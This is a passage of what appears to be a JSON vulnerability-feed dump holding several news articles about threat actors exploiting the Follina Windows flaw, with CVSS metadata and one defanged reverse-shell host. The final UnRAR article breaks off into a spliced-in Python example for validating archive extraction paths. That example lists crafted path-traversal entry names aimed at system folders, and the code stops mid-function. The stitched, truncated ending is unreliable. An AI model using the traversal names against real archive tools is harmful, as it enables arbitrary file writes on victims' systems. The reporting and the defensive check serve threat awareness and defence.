, "cvss3": {}, "published": "2022-06-01T06:02:00", "type": "thn", "title": "Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T10:00:06", "id": "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "href": "https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-22T06:04:11", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgn45Ck6vqDFvA2leDePKdPhlDH1ahczKEX1G7NW9CKxteJGkz3l_Dxpmjd1SnrDkHKguss5We9LWuDgnHlJuns2KL7DwAsl-xMBxv1S1VLDsBEjacQCutkUNEQVeTllKkGd_8PyVCTLk6MOVTWU_e_tEHf4dzp7n647bD1HgoUG5tWMG9ax-DFlaWb/s728-e100/russian-hackers.jpg>)\n\nA threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.\n\nRecorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as [Colibri loader](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and [Warzone RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria>).\n\nThe attacks are said to be an expansion of the [same campaign](<https://cert.gov.ua/article/405538>) that previously distributed [DCRat](<https://thehackernews.com/2022/05/experts-sound-alarm-on-dcrat-backdoor.html>) (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.\n\nSandworm is a [destructive Russian threat 
group](<https://thehackernews.com/2020/10/russian-hackers.html>) that's best known for carrying out attacks such as the 2015 and 2016 targeting of the Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.\n\nThe adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a [new variant of a piece of malware](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) known as Industroyer.\n\nSince Russia's invasion of Ukraine, the group has also unleashed numerous other attacks, including [leveraging the Follina vulnerability](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.\n\nIn addition, it was uncovered as the mastermind behind a new modular botnet called [Cyclops Blink](<https://thehackernews.com/2022/04/fbi-shut-down-russia-linked-cyclops.html>) that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.\n\nThe U.S. 
government, for its part, has announced up to [$10 million in rewards](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.\n\n\"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware,\" Recorded Future [said](<https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine>).\n\nThe attacks entail the fraudulent domains hosting a web page purportedly about \"Odesa Regional Military Administration,\" while an encoded ISO image payload is stealthily deployed via a technique referred to as [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>).\n\nHTML smuggling, as the name goes, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.\n\nRecorded Future also said it identified points of similarity with another [HTML dropper attachment](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.\n\nEmbedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.\n\nThe execution of the LNK file also launches an 
innocuous decoy document \u2013 an application for Ukrainian citizens to request for monetary compensation and fuel discounts \u2013 in an attempt to conceal the malicious operations.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-20T12:56:00", "type": "thn", "title": "Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-22T06:02:31", "id": "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "href": "https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T03:58:26", "description": 
"A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.\n\n\"Rozena is a backdoor malware that is capable of injecting a remote shell connection back to the attacker's machine,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor>) in a report this week.\n\nTracked as [CVE-2022-30190](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>), the now-patched Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability has come under heavy exploitation in recent weeks ever since it came to light in late May 2022.\n\nThe starting point for the latest attack chain observed by Fortinet is a weaponized [Office document](<https://www.virustotal.com/gui/file/432bae48edf446539cae5e20623c39507ad65e21cb757fb514aba635d3ae67d6/details>) that, when opened, connects to a [Discord CDN URL](<https://thehackernews.com/2021/04/alert-theres-new-malware-out-there.html>) to retrieve an HTML file (\"[index.htm](<https://www.virustotal.com/gui/file/3558840ffbc81839a5923ed2b675c1970cdd7c9e0036a91a0a728af14f80eff3/details>)\") that, in turn, invokes the diagnostic utility using a PowerShell command to download next-stage payloads from the same CDN attachment space.\n\nThis includes the Rozena implant (\"Word.exe\") and a batch file (\"cd.bat\") that's designed to terminate MSDT processes, establish the backdoor's persistence by means of Windows Registry modification, and download a harmless Word document as a decoy.\n\nThe malware's core function is to 
inject shellcode that launches a reverse shell to the attacker's host (\"microsofto.duckdns[.]org\"), ultimately giving the attacker the control over the system needed to monitor and capture information, while also maintaining a backdoor into the compromised system.\n\nThe exploitation of the Follina flaw to distribute malware through malicious Word documents comes as social engineering attacks are [relying](<https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns>) on Microsoft Excel, Windows shortcut (LNK), and ISO image files as droppers to deploy malware such as [Emotet](<https://thehackernews.com/2022/06/new-emotet-variant-stealing-users.html>), [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>), [IcedID](<https://thehackernews.com/2022/04/new-hacking-campaign-targeting.html>), and [Bumblebee](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) to a victim's device.\n\nThe droppers are said to be distributed through emails that directly contain the dropper or a password-protected ZIP as an attachment, an HTML file that extracts the dropper when opened, or a link to download the dropper in the body of the email.\n\nWhile attacks spotted in early April prominently featured Excel files with XLM macros, Microsoft's decision to block macros by default around the same time is said to have forced the threat actors to pivot to alternative methods like [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>) as well as .LNK and .ISO 
files.\n\nLast month, Cyble disclosed details of a malware tool called [Quantum](<https://thehackernews.com/2022/06/new-quantum-builder-lets-attackers.html>) that's being sold on underground forums so as to equip cybercriminal actors with capabilities to build malicious .LNK and .ISO files.\n\nIt's worth noting that [macros](<https://docs.microsoft.com/en-us/microsoft-365/security/intelligence/macro-malware>) have been a tried-and-tested [attack vector](<https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/>) for adversaries looking to drop ransomware and other malware on Windows systems, whether it be through phishing emails or other means.\n\nMicrosoft has since [temporarily paused](<https://thehackernews.com/2022/07/microsoft-quietly-rolls-back-plan-to.html>) its plans to disable Office macros in files downloaded from the internet, with the company telling The Hacker News that it's taking the time to make \"additional changes to enhance usability.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-09T08:49:00", "type": "thn", "title": "Hackers Exploiting Follina Bug to Deploy Rozena Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-12T03:25:38", "id": "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "href": "https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T05:56:38", "description": "An unofficial security patch has been made available for a new Windows zero-day vulnerability in the 
Microsoft Support Diagnostic Tool (MSDT), even as the Follina flaw continues to be exploited in the wild.\n\nThe issue \u2014 referenced as **DogWalk** \u2014 relates to a path traversal flaw that can be exploited to stash a malicious executable file in the Windows Startup folder when a potential target opens a specially crafted \".diagcab\" archive file that contains a diagnostics configuration file.\n\nThe idea is that the payload would get executed the next time the victim logs in to the system after a restart. The vulnerability affects all Windows versions, starting from Windows 7 and Server 2008 to the latest releases.\n\nDogWalk was originally [disclosed](<https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd>) by security researcher Imre Rad in January 2020 after Microsoft, having acknowledged the problem, deemed it not a security issue.\n\n\"There are a number of file types that can execute code in such a way but aren't technically 'executables,'\" the tech giant said at the time. 
"And a number of these are considered unsafe for users to download/receive in email, even '.diagcab' is blocked by default in Outlook on the web and other places.\"\n\nWhile all files downloaded and received via email include a Mark-of-the-Web ([MOTW](<https://attack.mitre.org/techniques/T1553/005/>)) tag that's used to determine their origin and trigger an appropriate security response, 0patch's Mitja Kolsek noted that the MSDT application is not designed to check this flag and hence allows the .diagcab file to be opened without warning.\n\n\"Outlook is not the only delivery vehicle: such file is cheerfully downloaded by all major browsers including Microsoft Edge by simply visiting(!) a website, and it only takes a single click (or mis-click) in the browser's downloads list to have it opened,\" Kolsek [said](<https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html>).\n\n\"No warning is shown in the process, in contrast to downloading and opening any other known file capable of executing [the] attacker's code.\"\n\nThe patches and the [renewed interest](<https://twitter.com/j00sean/status/1532416426702786560>) in the zero-day bug follow [active exploitation](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) of the \"[Follina](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>)\" remote code execution vulnerability by leveraging malware-laced Word documents that abuse the \"ms-msdt:\" protocol URI scheme.\n\nAccording to enterprise security firm Proofpoint, the flaw (CVE-2022-30190, CVSS score: 7.8) is being weaponized by a threat actor tracked as 
[TA570](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to deliver the [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>) (aka Qakbot) information-stealing trojan.\n\n\"Actor uses thread hijacked messages with HTML attachments which, if opened, drop a ZIP archive,\" the company [said](<https://twitter.com/threatinsight/status/1534227444915482625>) in a series of tweets detailing the phishing attacks.\n\n\"Archive contains an IMG with a Word doc, shortcut file, and DLL. The LNK will execute the DLL to start QBot. The doc will load and execute a HTML file containing PowerShell abusing CVE-2022-30190 used to download and execute QBot.\"\n\nQBot has also been employed by [initial access brokers](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to gain initial access to target networks, enabling ransomware affiliates to [abuse the foothold](<https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/>) to deploy file-encrypting malware.\n\nThe DFIR Report, earlier this year, also [documented](<https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/>) how QBot infections move at a rapid pace, enabling the malware to harvest browser data and Outlook emails a mere 30 minutes after initial access and propagate the payload to an adjacent workstation around the 50-minute mark.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:24:00", "type": "thn", "title": "Researchers Warn of Unpatched \"DogWalk\" Microsoft Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T05:26:49", "id": "THN:A24E3ECC17FDA35932981ED1D0B9B351", "href": "https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T05:59:49", "description": "An unknown threat actor has been targeting Russian entities with a newly discovered 
remote access trojan called **Woody RAT** for at least a year as part of a spear-phishing campaign.\n\nThe advanced custom backdoor is said to be delivered via either of two methods: archive files or Microsoft Office documents leveraging the now-patched \"Follina\" support diagnostic tool vulnerability ([CVE-2022-30190](<https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html>)) in Windows.\n\nLike other implants engineered for espionage-oriented operations, Woody RAT sports a wide range of features that enable the threat actor to remotely commandeer the infected systems and steal sensitive information from them.\n\n\"The earliest versions of this RAT were typically archived into a ZIP file pretending to be a document specific to a Russian group,\" Malwarebytes researchers Ankur Saini and Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) in a Wednesday report.\n\n\"When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload.\"\n\nIn one instance, the hacking group attempted to strike a Russian aerospace and defense entity known as [OAK](<https://www.uacrussia.ru/en/>) based on evidence gleaned from a fake domain registered for this purpose.\n\nAttacks leveraging the Windows flaw as part of this campaign first came to light on June 7, 2022, when researchers from the MalwareHunterTeam [disclosed](<https://twitter.com/malwrhunterteam/status/1534184385313923072>) the use of a document named \"\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx\" (which translates to \"Memo.docx\") to deliver a CSS payload containing the trojan.\n\nThe document 
purportedly offers best security practices for passwords and confidential information, among others, while acting as a decoy for dropping the backdoor.\n\nBesides encrypting its communications with a remote server, Woody RAT is equipped with capabilities to write arbitrary files to the machine, execute additional malware, delete files, enumerate directories, capture screenshots, and gather a list of running processes.\n\nAlso embedded within the malware are two .NET-based libraries named WoodySharpExecutor and WoodyPowerSession that can be used to run .NET code and PowerShell commands received from the server, respectively.\n\nFurthermore, the malware makes use of the [process hollowing technique](<https://attack.mitre.org/techniques/T1055/012/>) to inject itself into a suspended Notepad process and deletes itself from the disk to evade detection from security software installed on the compromised host.\n\nMalwarebytes has yet to attribute the attacks to a specific threat actor, citing a lack of solid indicators linking the campaign to a previously known group, although Chinese and North Korean nation-state collectives have targeted Russia in the past.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-04T12:55:00", "type": "thn", "title": "New Woody RAT Malware Being Used to Target Russian Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T05:42:05", "id": "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "href": "https://thehackernews.com/2022/08/new-woody-rat-malware-being-used-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:01", "description": "Former members of the Conti cybercrime cartel have been implicated in five different 
campaigns targeting Ukraine from April to August 2022.\n\nThe findings, which come from Google's Threat Analysis Group (TAG), build upon a [prior report](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) published in July 2022 detailing the [continued cyber activity](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/>) aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war.\n\n\"UAC-0098 is a threat actor that historically delivered the [IcedID banking trojan](<https://thehackernews.com/2022/03/hackers-hijack-email-reply-chains-on.html>), leading to human-operated ransomware attacks,\" TAG researcher Pierre-Marc Bureau [said](<https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/>) in a report shared with The Hacker News.\n\n\"The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations.\"\n\nUAC-0098 is believed to have functioned as an initial access broker for ransomware groups such as Quantum and [Conti](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) (aka FIN12, Gold Ulrick, or Wizard Spider), the former of which was [subsumed by the latter](<https://thehackernews.com/2022/08/conti-cybercrime-cartel-using-bazarcall.html>) in April 2022.\n\nOne of the prominent campaigns undertaken by the group in June 2022 entailed the abuse of the [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the 
Windows operating system to deploy CrescentImp and Cobalt Strike Beacons onto targeted hosts in media and critical infrastructure entities.\n\nBut this appears to be part of a series of attacks that commenced as far back as late April 2022, when the group conducted an email phishing campaign to deliver [AnchorMail](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>) (aka LackeyBuilder), a variant of the TrickBot group's AnchorDNS implant that uses SMTP for command-and-control.\n\nSubsequent phishing campaigns distributing IcedID and Cobalt Strike have been directed against Ukrainian organizations, repeatedly striking the hospitality sector, some of which impersonated the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink.\n\nAround mid-May, UAC-0098 is also said to have leveraged a compromised account of a hotel in India to send malware-laced attachments to organizations working in the hospitality industry in Ukraine, before expanding to humanitarian NGOs in Italy.\n\nSimilar attacks have also been observed against entities in the technology, retail, and government sectors, with the IcedID binary concealed as a Microsoft update to trigger the infection. Post-exploitation steps carried out following a successful compromise have not been identified.\n\nUAC-0098 is far from the only Conti-affiliated hacking group to set its sights on Ukraine since the onset of the war. 
In July 2022, IBM Security X-Force [disclosed](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) that the TrickBot gang orchestrated six different campaigns to systematically target the country with a plethora of malware.\n\n\"UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests,\" Bureau said.\n\n\"The group demonstrates strong interest in breaching businesses operating in the hospitality industry of Ukraine, going as far as launching multiple distinct campaigns against the same hotel chains.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-07T14:42:00", "type": "thn", "title": "Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-14T13:52:54", "id": "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "href": "https://thehackernews.com/2022/09/some-members-of-conti-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-07T15:29:02", "description": "The Computer Emergency Response Team of Ukraine (CERT-UA) has [cautioned](<https://cert.gov.ua/article/341128>) of a new set of spear-phishing attacks exploiting the \"Follina\" flaw in the Windows operating system to deploy password-stealing malware.\n\nAttributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled \"Nuclear Terrorism A Very Real Threat.rtf\" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.\n\nFollina ([CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>), CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), but not before it was subjected to widespread zero-day exploit activity by numerous threat actors.\n\nAccording to an independent report published by Malwarebytes, [CredoMap](<https://www.virustotal.com/gui/file/2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933/detection>) is a variant of the .NET-based 
credential stealer that Google Threat Analysis Group (TAG) [divulged](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) last month as having been deployed against users in Ukraine.\n\nThe malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.\n\n\"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence,\" Malwarebytes [said](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>). \"The target, and the involvement of APT28, a division of Russian military intelligence, suggests that the campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state.\"\n\nIt's not just APT28. 
CERT-UA has further [warned](<https://cert.gov.ua/article/160530>) of [similar](<https://cert.gov.ua/article/339662>) [attacks](<https://cert.gov.ua/article/40559>) mounted by [Sandworm](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nThe development comes as Ukraine continues to be a [target for cyberattacks](<https://thehackernews.com/2022/05/ukrainian-cert-warns-citizens-of-new.html>) amidst the country's ongoing war with Russia, with [Armageddon hackers](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) also spotted [distributing](<https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine>) the [GammaLoad.PS1_v2 malware](<https://cert.gov.ua/article/40240>) in May 2022.\n\n**_Update:_** Amidst relentless hacking attempts tailored to drop malware in Ukrainian organizations, Microsoft revealed in a [special report](<https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/>) that state-backed Russian hackers have engaged in \"strategic espionage\" against 128 targets spanning governments, think tanks, businesses, and aid groups in 42 countries supporting Kyiv since the onset of the war.\n\n49% of the observed activity focused on government agencies, followed by IT (20%), critical infrastructure (19%), and NGOs (12%). 
Just 29% of these intrusions are said to have been successful, with a quarter of the incidents leading to the exfiltration of sensitive data.\n\n\"To date, the Russians haven't used destructive 'wormable' malware that can jump from one computer domain to another and thereby cross international borders to spread economic damage,\" the Redmond-based tech giant said.\n\n\"Instead, they are designing attacks to stay within Ukraine. While Russia has been careful to confine its destructive malware to specific network domains located within Ukraine itself, these attacks are more sophisticated and widespread.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-22T12:51:00", "type": "thn", "title": "Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-30190"], "modified": "2022-09-07T14:46:15", "id": "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "href": "https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-11T04:01:33", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw in the UnRAR utility to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nTracked as CVE-2022-30333 (CVSS score: 7.5), the issue concerns a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nThis means that an adversary could exploit the flaw to drop arbitrary files on a target system that has the utility installed simply by getting the archive extracted there. 
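The two checks an archive unpacker needs so that a crafted entry name cannot land a file outside the extraction root, as an added example in Python that is not UnRAR's own code or the fix RARLAB shipped. The entry names, the destination directories and the planted symlink are all constructed inside the script, and no RAR file is parsed. The name check normalises backslashes to forward slashes before it looks for traversal (validating first and normalising afterwards is the classic way such a check is bypassed on Unix), and the write-time check resolves the parent directory with realpath so that a symlink planted by an earlier entry cannot redirect a later write outside the destination.

```python
"""Extraction-path validation for archive entries.

Added example, not UnRAR's code. Entry names below are constructed, as an
archive might carry them; the symlink scenario in demo() is constructed too.
"""
import os
import tempfile

SAMPLE_ENTRIES = [  # constructed entry names
    "docs/readme.txt",
    "../../etc/cron.d/job",
    "..\\..\\etc\\cron.d\\job",   # traversal hidden behind backslashes
    "/etc/cron.d/job",
    "C:\\Windows\\job",
]


def normalise(name):
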